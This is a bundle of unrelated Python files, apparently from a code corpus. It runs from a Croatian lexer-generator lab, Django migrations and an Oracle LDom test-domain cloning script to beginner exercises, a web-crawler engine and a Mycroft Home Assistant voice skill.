leksicko_pravilo.regex = linija_unosa[indeks + 1:]
if leksicko_pravilo not in lista_leksickih_pravila:
lista_leksickih_pravila.append(leksicko_pravilo)
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[0] == "{":
while linija_unosa[0] != "}":
linija_unosa = sys.stdin.readline()[:-1]
if linija_unosa[0] != "{" and linija_unosa[0] != "}":
leksicko_pravilo.dodaj_argument(linija_unosa)
ucitaj_leksicka_pravila()
""" [Metoda koja unutar regex-a svih regularnih definicija, regularnu definiciju zamjenjuje
sa pripadnim regex-om] """
def reformatiraj_regularne_definicije():
if not regularne_definicije:
return
for key in regularne_definicije:
for regDef in regularne_definicije:
if regDef in regularne_definicije.get(key):
#print(key, regDef, regularne_definicije[key], regularne_definicije[regDef])
regularne_definicije[key] = regularne_definicije[key].replace(regDef,
"(" + regularne_definicije[regDef] + ")")
regularne_definicije[key] = regularne_definicije[key].replace('$', '')
return
def pretvori_epsilone(regex):
res = regex
for indeks in range(len(regex)):
if regex[indeks] == '$' and Automat.je_operator(regex, indeks):
res = res[:indeks] + res[indeks+1:]
return res
""" [Metoda koja unutar regex-a zamjenjuje regularne definicije sa pripradnim regex-om] """
def reformatiraj_pravila():
for leksicko_pravilo in lista_leksickih_pravila:
#leksicko_pravilo.regex = leksicko_pravilo.regex.replace('$', '')
leksicko_pravilo.regex = pretvori_epsilone(leksicko_pravilo.regex)
if regularne_definicije:
for key in regularne_definicije:
#print("key:", key)
if key in leksicko_pravilo.regex:
#print("leks pravilo regex:", leksicko_pravilo.regex)
#leksicko_pravilo.regex = regularne_definicije[key]
#print("leks pravilo regex novi:", leksicko_pravilo.regex)
leksicko_pravilo.regex = leksicko_pravilo.regex.replace(key, "(" + regularne_definicije[key] + ")")
return
#todo
def izgradi_automat():
global glavni_automat
trenutni_broj_stanja_automata = 0
for leksicko_pravilo in lista_leksickih_pravila:
automat = Automat(trenutni_broj_stanja_automata)
[pocetno_stanje, konacno_stanje] = automat.pretvori(leksicko_pravilo.regex)
lista_malih_automata.append(automat)
glavni_automat.funkcije_prijelaza.update(automat.funkcije_prijelaza)
glavni_automat.prihvatljiva_stanja.append(konacno_stanje)
glavni_automat.dodaj_prijelaz(-1, pocetno_stanje, '')
trenutni_broj_stanja_automata = automat.broj_stanja
glavni_automat.broj_stanja = trenutni_broj_stanja_automata
return
def generirajLA():
datotekaLA_predlozak = open("PPJLabosi\ppj-labos\lab1\\analizator\LA", "rt")
datotekaLA = open("PPJLabosi\ppj-labos\lab1\\analizator\LA.py", "wt")
datotekaLA.write(datotekaLA_predlozak.read())
datotekaLA_predlozak.close()
datotekaLA.write("\ntablica_prijelaza = " + str(glavni_automat.funkcije_prijelaza) + "\n")
datotekaLA.write(ispis_koda_leksickih_pravila())
datotekaLA.write("lista_stanja = " + str(lista_stanja) + "\n")
datotekaLA.write("trenutno_stanje = " + '\'' + str(lista_stanja[0]) + '\'' + "\n")
datotekaLA.write("prihvatljiva_stanja = " + str(glavni_automat.prihvatljiva_stanja) + "\n")
datotekaLA.write("\n")
datotekaLA.write("\"\"\" [Main metoda] \"\"\"\n")
datotekaLA.write("\n")
datotekaLA.write("ucitaj_kod()\n")
datotekaLA.write("simuliraj()\n")
datotekaLA.close()
return
""" [Metoda koja generira varijablu argumenata leksičkih pravila da se pošalje datoteci LA] """
def ispis_koda_leksickih_pravila():
ispis = "leksicka_pravila = "
leksicka_pravila = []
for leksicko_pravilo in lista_leksickih_pravila:
#print(leksicko_pravilo.regex)
leksicka_pravila.append((leksicko_pravilo.stanje, leksicko_pravilo.argumenti))
ispis += str(leksicka_pravila)
ispis += "\n"
return ispis
def ispis_tablica_prijelaza_malih_automata():
ispis = "tablice_prijelaza_malih_automata = ["
for mali_automat in lista_malih_automata:
ispis += str(mali_automat.funkcije_prijelaza) + ","
ispis = ispis[:-1]
ispis += "]"
return ispis
""" [Main metoda programa] """
ucitaj_podatke()
reformatiraj_regularne_definicije()
reformatiraj_pravila()
izgradi_automat()
generirajLA() |
#!/bin/python3
import os
import sys
from functools import lru_cache
# Complete the stepPerms function below.
# A(n) = A(n - 1) + A(n - 2) + A(n - 3)
# A(1)=1; A(2)=2; A(3)=4.
MODULE = 10000000007
@lru_cache(maxsize=256)
def stepPerms(n):
if (n == 1):
return 1
elif (n == 2):
return 2
elif (n == 3):
return 4
else:
return (stepPerms(n-1) % MODULE + \
stepPerms(n-2) % MODULE + \
stepPerms(n-3) % MODULE) % MODULE
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = int(input())
for s_itr in range(s):
n = int(input())
res = stepPerms(n)
fptr.write(str(res) + '\n')
fptr.close()
|
#!/usr/bin/python2.7
#
# Copyright (c) 2015, Oracle and/or its affiliates. All rights reserved.
#
import os
import time
import threading
import commands
import Ldom
import re
def execute(cmd):
(status, output) = commands.getstatusoutput(cmd)
if status != 0:
raise Exception("Execution of [%s] failed:\n%s" % (cmd, output))
return output
def get_volume_of_domain(ldm):
'''
Purpose:
Get the volume of a domain
Arguments:
ldm - Domain name
Return:
source_volume - Volume of the domain
'''
source_volume = []
cmd_get_disk_num = "ldm list-bindings -p %s|grep VDISK|wc -l" % ldm
disk_num_string = execute(cmd_get_disk_num)
disk_num = int(disk_num_string.strip())
if disk_num > 1:
cmd_list_bindings = 'ldm list-bindings -p %s' % ldm
bindings = execute(cmd_list_bindings)
pattern = re.compile('VDISK.*')
disk_bindings_list = pattern.findall(bindings)
for disk_binding in disk_bindings_list:
disk_volume = disk_binding.split("|")[2].split("@")[0]
cmd_get_disk_service = "ldm list-services -p|grep {0}".format(
disk_volume)
all_vd_services = execute(cmd_get_disk_service)
pattern = re.compile(r'{0}.*'.format(disk_volume))
all_vdsdev_list = pattern.findall(all_vd_services)
for vdsdev_info in all_vdsdev_list:
vol = vdsdev_info.split("|")[0]
match_vdsdev_volume = re.match(
r'^{0}$'.format(disk_volume),
vol)
if match_vdsdev_volume is not None:
match_vdsdev_info = vdsdev_info
break
source_volume.append(
match_vdsdev_info.split("|")[2].lstrip("dev=/dev/zvol/dsk/"))
else:
cmd_get_disk_binding = "ldm list-bindings -p %s|grep VDISK" % ldm
disk_binding = execute(cmd_get_disk_binding).strip()
disk_volume = disk_binding.split("|")[2].split("@")[0]
cmd_get_disk_service = "ldm list-services -p|grep {0}".format(
disk_volume)
all_vds_services = execute(cmd_get_disk_service)
pattern = re.compile(r'{0}.*'.format(disk_volume))
all_vdsdev_list = pattern.findall(all_vds_services)
for vdsdev_info in all_vdsdev_list:
vol = vdsdev_info.split("|")[0]
match_vdsdev_volume = re.match(r'^{0}$'.format(disk_volume), vol)
if match_vdsdev_volume is not None:
match_vdsdev_info = vdsdev_info
break
source_volume.append(
match_vdsdev_info.split("|")[2].lstrip("dev=/dev/zvol/dsk/"))
return source_volume
def clone_from_source_domain(source_volume_snapshot, *target_list):
'''
Purpose:
Create a domain by clone the volume
Arguments:
source_volume_snapshot - Snapshot of the volume
target_list - Domains to create
Return:
None
'''
for target in target_list:
target_domain_volume = 'rpool/{0}'.format(target)
cmd_clone_from_source_volume = 'zfs clone {0} {1}'.format(
source_volume_snapshot,
target_domain_volume)
execute(cmd_clone_from_source_volume)
cmd_add_domain = 'ldm add-domain %s' % target
cmd_add_vcpu = 'ldm add-vcpu 8 %s' % target
cmd_add_memory = 'ldm add-memory 16G %s' % target
cmd_get_vsw = "ldm list-services -p|grep VSW|awk -F'|' '{print $2}'"
vsw = execute(cmd_get_vsw).split("=")[1]
cmd_add_vnet = 'ldm add-vnet vnet_{0} {1} {2}'.format(
target,
vsw,
target)
cmd_get_vds = "ldm list-services -p|grep VDS|awk -F'|' '{print $2}'"
vds = execute(cmd_get_vds).split("=")[1]
cmd_add_vdsdev = 'ldm add-vdsdev /dev/zvol/dsk/{0} {1}@{2}'.format(
target_domain_volume,
target,
vds)
cmd_add_vdisk = 'ldm add-vdisk vdisk_{0} {1}@{2} {3}'.format(
target,
target,
vds,
target)
cmd_set_auto_boot = 'ldm set-var auto-boot?=true {0}'.format(target)
cmd_set_boot_device = 'ldm set-var boot-device=vdisk_{0} {1}'.format(
target,
target)
cmd_bind_domain = 'ldm bind {0}'.format(target)
cmd_create_domain_list = [
cmd_add_domain,
cmd_add_vcpu,
cmd_add_memory,
cmd_add_vnet,
cmd_add_vdsdev,
cmd_add_vdisk,
cmd_set_auto_boot,
cmd_set_boot_device,
cmd_bind_domain]
for cmd in cmd_create_domain_list:
execute(cmd)
time.sleep(1)
def get_pf_bus(pf):
'''
Purpose:
Get the bus where pf affiliated
Arguments:
pf - port of the device
Return:
None
'''
pci_dev = pf[:-10]
cmd_get_bus = "ldm list-io -l -p %s|grep 'type=PCIE'" % pci_dev
try:
output_get_bus = execute(cmd_get_bus)
except Exception as e:
raise Exception("No mapping PCIE device of %s in the system" % pf)
bus = output_get_bus.split('|')[6].split('=')[1]
return bus
def main():
root_domain_1_name = os.getenv("NPRD_A")
root_domain_2_name = os.getenv("NPRD_B")
io_domain_name = os.getenv("IOD")
password = os.getenv("SOURCE_DOMAIN_PASSWORD")
pf_1 = os.getenv("PF_A")
pf_2 = os.getenv("PF_B")
domains_list = [root_domain_1_name, root_domain_2_name, io_domain_name]
for domain in domains_list:
cmd_ldm_list = "ldm list %s" % domain
(status, output) = commands.getstatusoutput(cmd_ldm_list)
if status == 0:
print "%s already exists, abort to create root domains " \
"and io domain" % domain
return 1
source_domain_name = os.getenv("SOURCE_DOMAIN")
cmd = 'ldm list %s' % source_domain_name
try:
execute(cmd)
except Exception as e:
print(e)
return 1
print("Begin clone domains from source domain %s" % source_domain_name)
source_volume_list = get_volume_of_domain(source_domain_name)
if len(source_volume_list) > 1:
# User choose which volume to snapshot
while True:
user_choose_num = 0
for source_volume in source_volume_list:
print "[{0}]{1}".format(user_choose_num, source_volume)
user_choose_num += 1
snapshot_volume_input_flag = raw_input(
"Which volume do you want to snapshot?")
if snapshot_volume_input_flag == "":
snapshot_volume_input_num = 0
else:
try:
snapshot_volume_input_num = int(snapshot_volume_input_flag)
except Exception:
print "Please input a num above"
else:
if not 0 <= snapshot_volume_input_num <= len(
source_volume_list):
print "Please input a num above"
else:
break
source_volume = source_volume_list[snapshot_volume_input_num]
else:
source_volume = source_volume_list[0]
# Snapshot this volume to create new volume used by new domains
now = time.strftime("%m%d%H%M")
source_volume_snapshot = "{0}".format(source_volume) + "@ior-" + now
cmd_snapshot = "zfs snapshot {0}".format(source_volume_snapshot)
print "Creating snapshot of {0} as {1}".format(source_volume,
source_volume_snapshot)
execute(cmd_snapshot)
cmd_check_snapshot_success = 'zfs list -t snapshot|grep %s' % \
source_volume_snapshot
try:
execute(cmd_check_snapshot_success)
except Exception:
print(
"snapshot %s not as expected,cancel configuration" %
source_volume)
else:
print "Done,remember to destroy the snapshot %s after all the test" % \
source_volume_snapshot
try:
print "Creating domain %s..." % domains_list
clone_from_source_domain(source_volume_snapshot, *domains_list)
except Exception as e:
print(e)
else:
print("Create %s success" % domains_list)
time.sleep(5)
domain_pf_dict = {root_domain_1_name: pf_1, root_domain_2_name: pf_2}
for root_domain, pf in domain_pf_dict.items():
try:
bus = get_pf_bus(pf)
cmd_add_bus = "ldm add-io iov=on %s %s" % (bus, root_domain)
print "Allocating bus %s to domain %s" % (bus, root_domain)
execute(cmd_add_bus)
except Exception as e:
print "Failed to allocate bus to %s due to:\n%s" % (root_domain, e)
print "Test user should allocate pci bus to domain manually"
return 1
else:
print "Done"
print "Waiting created domains boot up..."
for domain in domains_list:
cmd_start = "ldm start %s" % domain
execute(cmd_start)
time.sleep(150)
for domain in domains_list:
cmd_list_domain = 'ldm list %s | grep %s' % (domain, domain)
output_list_domain = execute(cmd_list_domain)
domain_status = output_list_domain.split()[1].strip()
if domain_status != 'active':
print "%s is not up and could not login" % domain
break
cmd_check_hostname = 'hostname %s' % domain
domain_port = output_list_domain.split()[3].strip()
ldom = Ldom.Ldom(domain, password, domain_port, record=False)
try:
ldom.sendcmd(cmd_check_hostname, timeout=600)
except Exception as e:
print "%s is not up and not able to login due to:\n%s" % (domain, e)
else:
cmd_delete_ip = "ipadm delete-ip net0"
ldom.sendcmd(cmd_delete_ip, check=False)
cmd_disable_ldap = "svcadm disable svc:/network/ldap/client:default"
ldom.sendcmd(cmd_disable_ldap, check=False)
print "%s is up and able to test now" % domain
if __name__ == "__main__":
main()
|
# Generated by Django 2.1.5 on 2019-01-12 22:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hackathon', '0002_hackathon_added_by'),
]
operations = [
migrations.AddField(
model_name='hackathon',
name='max_size',
field=models.PositiveIntegerField(default=4),
),
]
|
# Third party
from utils import generate_resource_name
from aws_cdk import core, aws_ssm
from aws_cdk.core import Fn, Tag, CfnParameter
class InfraSampleStack3(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
env = "dev"
project = "testproject1"
service = "etl"
component = "workflow"
Tag.add(self, "Service", service)
Tag.add(self, "Component", component)
param_dwh = CfnParameter(
self,
"ParamDWH",
type="String",
description="The domain of the DWH to connect to. | team=data,service=dwh",
default="fakedwh.host",
)
value_raw = "import: ${value_to_import}, param: ${param_dwh}"
value = Fn.sub(
value_raw,
{
"value_to_import": Fn.import_value(
generate_resource_name(project, env, service, "buckets", "bucketb")
),
"param_dwh": Fn.ref(param_dwh.logical_id),
},
)
aws_ssm.StringParameter(
self,
"SSMParam",
parameter_name=generate_resource_name(
project, env, service, component, "ssmparam"
),
string_value=value,
)
|
'''
Exercise: Write a function, sum_array, that takes an array as an argument and returns the sum of all integers in the array
Considerations: Can you write the function such that it terminates gracefully given an unexepected input such as an input that
is not an array or an array that contains elements that are not an integer?
Expectations: Test case should pass and print "Test case passed!"
'''
# Program -> your code goes below
def sum_array(arr):
# solution goes here
s = 0
for num in arr:
s = num + s
return s
arr = [1,2,3,4,5,6] # length of arr = n = 10....n = 10000000
arr = [1,2,3,4,5,6] # length of arr = n = 10....n = 10000000
other_arr = [10,20,30]
# Tests
def test_sum_array(sum_array_function):
arr = [1,2,3,4,5]
solution = 15
sum_array_function(arr)
assert (sum_array_function(arr) == solution), f'Expected sum_array to return {solution} but instead returned {sum_array_function(arr)}'
#test_sum_array(sum_array)
print("Test cases passed!")
|
from Tkinter import *
class CatchGame:
def __init__(self,parent):
self.canvas = Canvas(parent, width=200, height=200)
self.canvas.grid(column=0, row=0)
self.ball = self.canvas.create_oval(90,90,110,110,fill="blue")
def move(self):
self.canvas.coords(self.ball, 150, 150, 170, 170)
root = Tk()
app = CatchGame(root)
root.mainloop()
|
import networkx as nx
import matplotlib.pyplot as plt
import sys
n=int(sys.argv[1]) #50
k=int(sys.argv[2]) #4
p=float(sys.argv[3]) #0.5
seed=int(sys.argv[4]) #1
#G=nx.newman_watts_strogatz_graph(n,k,p,seed)
G=nx.watts_strogatz_graph(n,k,p,seed)
#G = nx.petersen_graph()
#plt.subplot(121)
# <matplotlib.axes._subplots.AxesSubplot object at ...>
nx.draw(G, with_labels=True, font_weight='bold')
#plt.subplot(122)
# <matplotlib.axes._subplots.AxesSubplot object at ...>
#nx.draw_shell(G, with_labels=True, font_weight='bold')
plt.show()
nx.write_adjlist(G,"graph.data")
|
import numpy as np
numbers = [100, 102, 98, 97, 103]
print(np.std(numbers))
print(np.mean(numbers))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-02-25 17:04
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('budgetapp', '0004_category_owner'),
]
operations = [
migrations.AddField(
model_name='categorybudgetgroup',
name='owner',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='category_budget_groups', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AlterField(
model_name='budgetgoal',
name='budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='budget_goals', to='budgetapp.Budget'),
),
migrations.AlterField(
model_name='budgetgoal',
name='long_term_goal',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='budget_goals', to='budgetapp.LongTermGoal'),
),
migrations.AlterField(
model_name='categorybudget',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budgets', to='budgetapp.Category'),
),
migrations.AlterField(
model_name='categorybudget',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budgets', to='budgetapp.CategoryBudgetGroup'),
),
migrations.AlterField(
model_name='categorybudgetgroup',
name='budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='category_budget_groups', to='budgetapp.Budget'),
),
migrations.AlterField(
model_name='income',
name='budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='incomes', to='budgetapp.Budget'),
),
migrations.AlterField(
model_name='longtermgoal',
name='owner',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='long_term_goals', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='transaction',
name='category_budget',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='transactions', to='budgetapp.CategoryBudget'),
),
]
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from schedulers import Scheduler
from spaces import Categoric, Numeric
class GridSearcher(Scheduler):
"""Apply grid search for HPO"""
def __init__(self,
hyperparam_space,
early_stopper,
ensembler,
working_folder):
super(GridSearcher, self).__init__(
hyperparam_space, early_stopper, ensembler, working_folder)
# grid search for categorical parameters while the numeric parameters are set as default value
self.discrete_keys = []
for key, value in self._hyperparam_space.items():
if isinstance(value, Categoric) and len(value.categories) != 0:
self.discrete_keys.append(key)
self.total_discrete_param = np.product([len(self._hyperparam_space[key].categories)
for key in self.discrete_keys])
self.discrete_param_count = 0
self._cur_config = self.get_default()
def get_next_config(self):
self._early_stopper.reset()
param_index = self.discrete_param_count
for key in self.discrete_keys:
values = self._hyperparam_space[key].categories
self._cur_config[key] = values[param_index % len(values)]
param_index = int(param_index / len(values))
self.discrete_param_count += 1
return self._cur_config if self.discrete_param_count <= self.total_discrete_param else None
|
from threading import Thread
class Clock(Thread):
def __init__(self, cpu, lock):
self._cpu = cpu
self._lock = lock
def run(self):
while True:
self._cpu.run_tick()
self._lock.acquire() |
#coding:utf-8
'''
author : linkin
e-mail : yooleak@outlook.com
date : 2018-11-15
'''
import time
from amipy.core.serverthread import SpiderServer
from amipy.core.spiderhub import SpiderHub
from amipy.core.loader import SpiderLoader
from amipy.core.crawler import WebCrawler
from amipy.core.looper import Looper
from amipy.core.scheduler import Scheduler
from amipy.middlewares import MiddleWareManager
from amipy.log import getLogger
from amipy.util.time import time_to_date
class WorkStation(object):
def __init__(self,settings):
self.settings = settings
self.spider_loader = SpiderLoader(settings)
self.spiders = self.spider_loader.load_all_spiders()
self.crawler = WebCrawler(settings)
self.scheduler = Scheduler(settings)
self.looper = Looper()
self.spider_hub = SpiderHub(settings,self.crawler)
self.logger = getLogger(__name__)
# self.data_processor = DataProcessor(settings)
def _print_tips(self,got=True):
print(f'* Amipy - project : {self.settings["project"].PROJECT_NAME}')
if got:
date = time_to_date(int(time.time()))
print(f'* Running at {date}')
print(f'* Spiders inside the project: {[i.name for i in self.spiders]}')
else:
print('* No spiders inside the project yet.Try to create one!')
print('* You can create a spider by using commands like:\n')
print('>> amipy cspider myspider\n')
print('* Then you will see a directory named "myspider" ')
print(f'* under the "spiders" folder of the project "{self.settings["project"].PROJECT_NAME}".')
print('* What you need to do is "edit the spider.py" as you want.')
self._close()
def work(self,excludes=None,spider_names=None):
self.logger.debug('Workstation running.')
try:
if excludes:
spiders = [i for i in self.spiders if i.name not in excludes]
elif spider_names:
spiders = [i for i in self.spiders if i.name in spider_names]
if not spiders:
print(f'* Amipy - project : {self.settings["project"].PROJECT_NAME}')
print(f'* No spider named "{spider_names}" inside the project.')
return
else:
spiders = self.spiders
if not spiders:
self._print_tips(False)
return
else:
self._print_tips()
[i.__build_model__() for i in spiders]
print(f'* Current running spiders: {[i.name for i in spiders]}')
self.mw_manager = MiddleWareManager(self.settings, spiders)
if self.settings['project'].SPIDER_SERVER_ENABLE:
self.server = SpiderServer(self.settings,spiders)
self.server.start()
self.logger.debug('SpiderServer started.')
else:
print('* Press Ctrl+C to stop the crawling.\n')
self.spider_hub.takeover(spiders)
self.spider_hub.start(self.looper)
while 1:
self.scheduler.spiders_monitor(spiders)
self.scheduler.receive(self.spider_hub.requests)
tasks = self.crawler.convert(self.scheduler.export())
self.looper.run_tasks(tasks)
except (StopAsyncIteration,KeyboardInterrupt):
self._close()
self.logger.info('Amipy had been shut down.')
def _close(self):
for i in self.spiders:
if not i.closed:
i.close() |
class Hero:
# We want our hero to have a default "starting_health",
# so we can set that in the function header.
def __init__(self, name, starting_health=100):
# we know the name of our hero, so we assign it here
self.name = name
# similarly, our starting health is passed in, just like name
self.starting_health = starting_health
# when a hero is created, their current health is
# always the same as their starting health (no damage taken yet!)
self.current_health = starting_health
def fight(self, opponent):
self.opponent = opponent
return("Fight!")
####
if __name__ == "__main__":
# If you run this file from the terminal
# this block is executed.
hero_2 = Hero("Wonder Woman", 200)
print(hero_2.name)
print(hero_2.current_health)
####
####
if __name__ == "__main__":
# If you run this file from the terminal
# this block is executed.
hero_1 = Hero("Dumbledore", 200)
print(hero_1.name)
print(hero_1.current_health)
####
import random
opponents = [
"Wonder Woman", "Dumbledore"]
#print(f"All names:{opponents}/n")
idx = random.randint(0,len(opponents)-1)
print(f"{opponents[idx]} won! ")
if __name__ == "__main__":
# If you run this file from the terminal
# this block is executed.
hero_1 = Hero("Wonder Woman")
hero_2 = Hero("Dumbledore")
hero_1.fight(hero_2)
#Ability Class
#__init__: Parameters: name: String, max_damage:Integer
#attack: No Parameters
#import random
class Ability:
def __init__(self, name, max_damage):
self.name = name
self.max_damage = max_damage
def attack(self):
random_value = random.randrange(0,self.max_damage)
print(random_value)
#Armor Class
#__init__: Parameters: name: String, max_block: Integer
#block: Parameters: None
import random
class Armor:
def __init__(self, name, max_block):
self.name = name
self.max_block = max_block
def block(self):
random_value = random.randint(0, self.max_block)
return random_value
#Assault Class ... Just Because I Want To
#__init__: Parameters: name: String, max_block: Integer
#block: Parameters: None
class Assault:
def __init__(self, name, max_strike):
self.name = name
self.max_strike = max_strike
def strike(self):
random_value = random.randint(0, self.max_strike)
return random_value
#Hero Class
#__init__: Parameters: name:String, starting_health:Int (default value: 100)
#add_ability: Parameters: ability:Ability Object
#attack: No Parameters
#defend: incoming_damage: Integer
#take_damage: Parameters: damage
#is_alive: No Parameters
#fight: Parameters: opponent: Hero Class
|
from os.path import dirname, join
from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
from os.path import dirname, join
from requests import get, post
from fuzzywuzzy import fuzz
import json
__author__ = 'robconnolly, btotharye'
LOGGER = getLogger(__name__)
class HomeAssistantClient(object):
def __init__(self, host, password, portnum, ssl=False):
self.ssl = ssl
if self.ssl:
portnum
self.url = "https://%s:%d" % (host, portnum)
else:
self.url = "http://%s:%d" % (host, portnum)
self.headers = {
'x-ha-access': password,
'Content-Type': 'application/json'
}
def find_entity(self, entity, types):
if self.ssl:
req = get("%s/api/states" %
self.url, headers=self.headers, verify=True)
else:
req = get("%s/api/states" % self.url, headers=self.headers)
if req.status_code == 200:
best_score = 0
best_entity = None
for state in req.json():
try:
if state['entity_id'].split(".")[0] in types:
LOGGER.debug("Entity Data: %s" % state)
score = fuzz.ratio(
entity,
state['attributes']['friendly_name'].lower())
if score > best_score:
best_score = score
best_entity = {
"id": state['entity_id'],
"dev_name": state['attributes']
['friendly_name'],
"state": state['state']}
except KeyError:
pass
return best_entity
#
# checking the entity attributes to be used in the response dialog.
#
def find_entity_attr(self, entity):
if self.ssl:
req = get("%s/api/states" %
self.url, headers=self.headers, verify=True)
else:
req = get("%s/api/states" % self.url, headers=self.headers)
if req.status_code == 200:
for attr in req.json():
if attr['entity_id'] == entity:
entity_attrs = attr['attributes']
if attr['entity_id'].startswith('light.'):
unit_measur = entity_attrs['brightness']
sensor_name = entity_attrs['friendly_name']
sensor_state = attr['state']
return unit_measur, sensor_name, sensor_state
else:
try:
unit_measur = entity_attrs['unit_of_measurement']
sensor_name = entity_attrs['friendly_name']
sensor_state = attr['state']
return unit_measur, sensor_name, sensor_state
except BaseException:
unit_measur = 'null'
sensor_name = entity_attrs['friendly_name']
sensor_state = attr['state']
return unit_measur, sensor_name, sensor_state
return None
def execute_service(self, domain, service, data):
if self.ssl:
post("%s/api/services/%s/%s" % (self.url, domain, service),
headers=self.headers, data=json.dumps(data),
verify=self.verify)
else:
post("%s/api/services/%s/%s" % (self.url, domain, service),
headers=self.headers, data=json.dumps(data))
# TODO - Localization
class HomeAssistantSkill2(MycroftSkill):
def __init__(self):
super(HomeAssistantSkill2, self).__init__(name="HomeAssistantSkill2")
self.ha = HomeAssistantClient(self.config.get('host'),
self.config.get('password'), self.config.get('portnum') ,ssl=self.config.get('ssl', False))
def initialize(self):
movietime_intent = IntentBuilder("MovieTimeIntent").require("MovieTimeKeyword").build()
self.register_intent(movietime_intent, self.handle_movietime_intent)
bedtime_intent = IntentBuilder("BedTimeIntent").require("BedTimeKeyword").build()
self.register_intent(bedtime_intent, self.handle_bedtime_intent)
todo_list_intent = IntentBuilder("TodoListIntent").require("TodoListKeyword").build()
self.register_intent(todo_list_intent, self.handle_todo_list_intent)
movie_list_intent = IntentBuilder("MovieListIntent").require("MovieListKeyword").build()
self.register_intent(movie_list_intent, self.handle_movie_list_intent)
## add to home assistant
stop_spotify_intent = IntentBuilder("StopSpotifyIntent").require("StopSpotifyKeyword").build()
self.register_intent(stop_spotify_intent, self.handle_stop_spotify_intent)
next_song_intent = IntentBuilder("NextSongIntent").require("NextSongKeyword").build()
self.register_intent(next_song_intent, self.handle_next_song_intent)
volume_high_intent = IntentBuilder("VolumeHighIntent").require("VolumeHighKeyword").build()
self.register_intent(volume_high_intent, self.handle_volume_high_intent)
volume_mid_intent = IntentBuilder("VolumeMidIntent").require("VolumeMidKeyword").build()
self.register_intent(volume_mid_intent, self.handle_volume_mid_intent)
volume_low_intent = IntentBuilder("VolumeLowIntent").require("VolumeLowKeyword").build()
self.register_intent(volume_low_intent, self.handle_volume_low_intent)
going_out_intent = IntentBuilder("GoingOutIntent").require("GoingOutKeyword").build()
self.register_intent(going_out_intent, self.handle_going_out_intent)
def handle_movietime_intent(self, message):
entity = 'movie_time'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.speak('enjoy the show')
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_bedtime_intent(self, message):
entity = 'bed_time'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.speak('have a good sleep')
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_todo_list_intent(self, message):
entity = 'to_do_list'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
self.speak('have a good sleep')
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_movie_list_intent(self, message):
entity = 'movie_watch_script'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
### add to home assistant
def handle_stop_spotify_intent(self, message):
entity = 'stop_spotify'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_next_song_intent(self, message):
entity = 'next_song'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_volume_high_intent(self, message):
entity = 'volume_high'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_volume_mid_intent(self, message):
entity = 'volume_medium'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_volume_low_intent(self, message):
entity = 'volume_low'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
def handle_going_out_intent(self, message):
entity = 'going_out'
LOGGER.debug("Entity: %s" % entity)
ha_entity = self.ha.find_entity(entity, ['scene'])
ha_data = {'entity_id': ha_entity['id']}
self.ha.execute_service("homeassistant", "turn_on", ha_data)
self.speak('see you when you get back')
def stop(self):
pass
def create_skill():
return HomeAssistantSkill2()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 10 17:08:35 2020
@author: minjie
"""
%run train_ISIC_gllcmeta.py --datasets ../data/ISIC18/task3/ISIC2018_Task3_Training_Input_coloradj --net resnet50_singleview --out_dir ../checkpoints/resnet50_singleview_fast --num_epochs 50 --lr 0.005
